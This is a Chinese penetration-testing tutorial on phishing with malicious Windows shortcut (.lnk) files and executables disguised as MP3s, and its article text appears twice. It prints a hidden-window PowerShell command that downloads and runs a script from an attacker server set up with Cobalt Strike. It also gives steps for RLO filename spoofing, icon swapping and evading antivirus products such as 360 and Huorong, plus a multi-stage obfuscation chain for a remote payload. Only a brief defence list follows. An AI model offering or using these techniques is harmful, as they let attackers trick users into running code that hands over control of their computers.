渗透测试之地基钓鱼篇:Ink和Mp3伪装钓鱼
字数 1667 2025-08-15 21:33:06

渗透测试之地基钓鱼篇:Ink和Mp3伪装钓鱼技术详解

一、网络钓鱼概述

网络钓鱼是社会工程学攻击方式之一,主要通过对受害者心理弱点(好奇心、信任、贪婪等)进行欺骗。本文重点介绍两种高级钓鱼技术:

  1. Ink快捷方式钓鱼:利用Windows快捷方式文件执行恶意代码
  2. Mp3伪装钓鱼:通过修改文件图标和RLO技术伪装恶意程序

二、Ink快捷方式钓鱼技术

1. 技术原理

Lnk文件是Windows快捷方式文件,可以:

  • 指向其他文件或程序
  • 包含执行参数
  • 自定义图标
  • 写入免杀的shell代码,双击即可执行

2. 实施步骤

2.1 查找后门程序路径

  • 确定系统自带程序的绝对路径(如powershell.exe)
  • 示例路径:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

2.2 生成恶意链接

使用Cobalt Strike工具:

  1. 选择"Scripted Web Delivery"
  2. 选择Listener监听
  3. 点击"Launch"执行
  4. 复制生成的powershell回连恶意链接

2.3 创建恶意Ink文件

  1. 创建文本文件(如dayu.txt)

  2. 写入恶意代码,格式为:

    [绝对路径] [恶意命令]

    示例:

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.2.153:80/a'))"

  3. 创建快捷方式:

    • 右键 → 新建 → 快捷方式
    • 在"目标"字段写入恶意代码
    • 更改图标:%SystemRoot%\System32\shell32.dll(系统自带图标)

2.4 免杀处理

  • 对恶意代码进行Base64编码
  • 使用混淆技术

3. 钓鱼实施

  • 将恶意Ink文件上传至服务器
  • 诱骗用户下载并执行
  • 成功获取控制权限(可绕过360、火绒等杀软)

三、Mp3伪装钓鱼技术

1. 技术准备

  • 工具:Restorator 2018(图标修改工具)
  • 下载地址:http://www.pc6.com/softview/SoftView_585736.html
  • 图标资源:
    • https://www.easyicon.net/iconsearch/音乐ico/
    • http://www.bitbug.net/(在线制作ico图标)

2. 实施步骤

2.1 修改EXE文件图标

  1. 将免杀EXE文件拖入Restorator
  2. 准备音乐图标(MP3格式)
  3. 将图标转换为ico格式
  4. 在Restorator中替换原有图标

2.2 RLO技术修改文件显示

  1. 在文件名最后右键
  2. 选择"插入Unicode控制字符"
  3. 选择"RLO"(从右到左覆盖)
  4. 逆向编辑文件名(如想显示".mp3",需输入"3pm")

注意:RLO技术会被360查杀,适合针对不安装杀软的用户

2.3 钓鱼实施

  • 将伪装文件上传至公网服务器
  • 诱骗用户下载
  • 获取控制权限

四、高级免杀思路(2020年有效)

  1. 使用Cobalt Strike生成exe格式的payload
  2. 将exe-payload放置公网服务器
  3. 再生成python格式的payload
  4. 将python-payload转为Base64编码
  5. Base64值再用序列化转码
  6. 序列化后的payload再用反序列化转码
  7. 转成反序列化后的payload用python3的tinyaes混淆
  8. 最后加壳成目标环境执行的文件类型

执行原理:最终文件仅负责下载并执行公网服务器上的payload

五、防御建议

  1. 提高安全意识,不随意下载执行不明文件
  2. 显示文件完整扩展名(查看实际文件类型)
  3. 安装并更新杀毒软件
  4. 对RLO字符文件保持警惕
  5. 企业环境中限制powershell等工具的执行权限

六、技术总结

技术类型 优点 缺点 适用场景
Ink钓鱼 免杀效果好,可绕过主流杀软 需要用户双击执行 针对普通办公用户
Mp3伪装 伪装性强,诱惑力大 RLO技术会被360查杀 针对不装杀软的用户

这两种钓鱼方式成功率较高,通过变换图标和套路可有效诱骗用户。网络安全从业者应了解这些技术以提高防御能力。

渗透测试之地基钓鱼篇:Ink和Mp3伪装钓鱼技术详解 一、网络钓鱼概述 网络钓鱼是社会工程学攻击方式之一,主要通过对受害者心理弱点(好奇心、信任、贪婪等)进行欺骗。本文重点介绍两种高级钓鱼技术: Ink快捷方式钓鱼 :利用Windows快捷方式文件执行恶意代码 Mp3伪装钓鱼 :通过修改文件图标和RLO技术伪装恶意程序 二、Ink快捷方式钓鱼技术 1. 技术原理 Lnk文件是Windows快捷方式文件,可以: 指向其他文件或程序 包含执行参数 自定义图标 写入免杀的shell代码,双击即可执行 2. 实施步骤 2.1 查找后门程序路径 确定系统自带程序的绝对路径(如powershell.exe) 示例路径: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 2.2 生成恶意链接 使用Cobalt Strike工具: 选择"Scripted Web Delivery" 选择Listener监听 点击"Launch"执行 复制生成的powershell回连恶意链接 2.3 创建恶意Ink文件 创建文本文件(如dayu.txt) 写入恶意代码,格式为: 示例: 创建快捷方式: 右键 → 新建 → 快捷方式 在"目标"字段写入恶意代码 更改图标: %SystemRoot%\System32\shell32.dll (系统自带图标) 2.4 免杀处理 对恶意代码进行Base64编码 使用混淆技术 3. 钓鱼实施 将恶意Ink文件上传至服务器 诱骗用户下载并执行 成功获取控制权限(可绕过360、火绒等杀软) 三、Mp3伪装钓鱼技术 1. 技术准备 工具:Restorator 2018(图标修改工具) 下载地址:http://www.pc6.com/softview/SoftView_ 585736.html 图标资源: https://www.easyicon.net/iconsearch/音乐ico/ http://www.bitbug.net/(在线制作ico图标) 2. 实施步骤 2.1 修改EXE文件图标 将免杀EXE文件拖入Restorator 准备音乐图标(MP3格式) 将图标转换为ico格式 在Restorator中替换原有图标 2.2 RLO技术修改文件显示 在文件名最后右键 选择"插入Unicode控制字符" 选择"RLO"(从右到左覆盖) 逆向编辑文件名(如想显示".mp3",需输入"3pm") 注意:RLO技术会被360查杀,适合针对不安装杀软的用户 2.3 钓鱼实施 将伪装文件上传至公网服务器 诱骗用户下载 获取控制权限 四、高级免杀思路(2020年有效) 使用Cobalt Strike生成exe格式的payload 将exe-payload放置公网服务器 再生成python格式的payload 将python-payload转为Base64编码 Base64值再用序列化转码 序列化后的payload再用反序列化转码 转成反序列化后的payload用python3的tinyaes混淆 最后加壳成目标环境执行的文件类型 执行原理:最终文件仅负责下载并执行公网服务器上的payload 五、防御建议 提高安全意识,不随意下载执行不明文件 显示文件完整扩展名(查看实际文件类型) 安装并更新杀毒软件 对RLO字符文件保持警惕 企业环境中限制powershell等工具的执行权限 六、技术总结 | 技术类型 | 优点 | 缺点 | 适用场景 | |---------|------|------|---------| | Ink钓鱼 | 免杀效果好,可绕过主流杀软 | 需要用户双击执行 | 针对普通办公用户 | | Mp3伪装 | 伪装性强,诱惑力大 | RLO技术会被360查杀 | 针对不装杀软的用户 | 这两种钓鱼方式成功率较高,通过变换图标和套路可有效诱骗用户。网络安全从业者应了解这些技术以提高防御能力。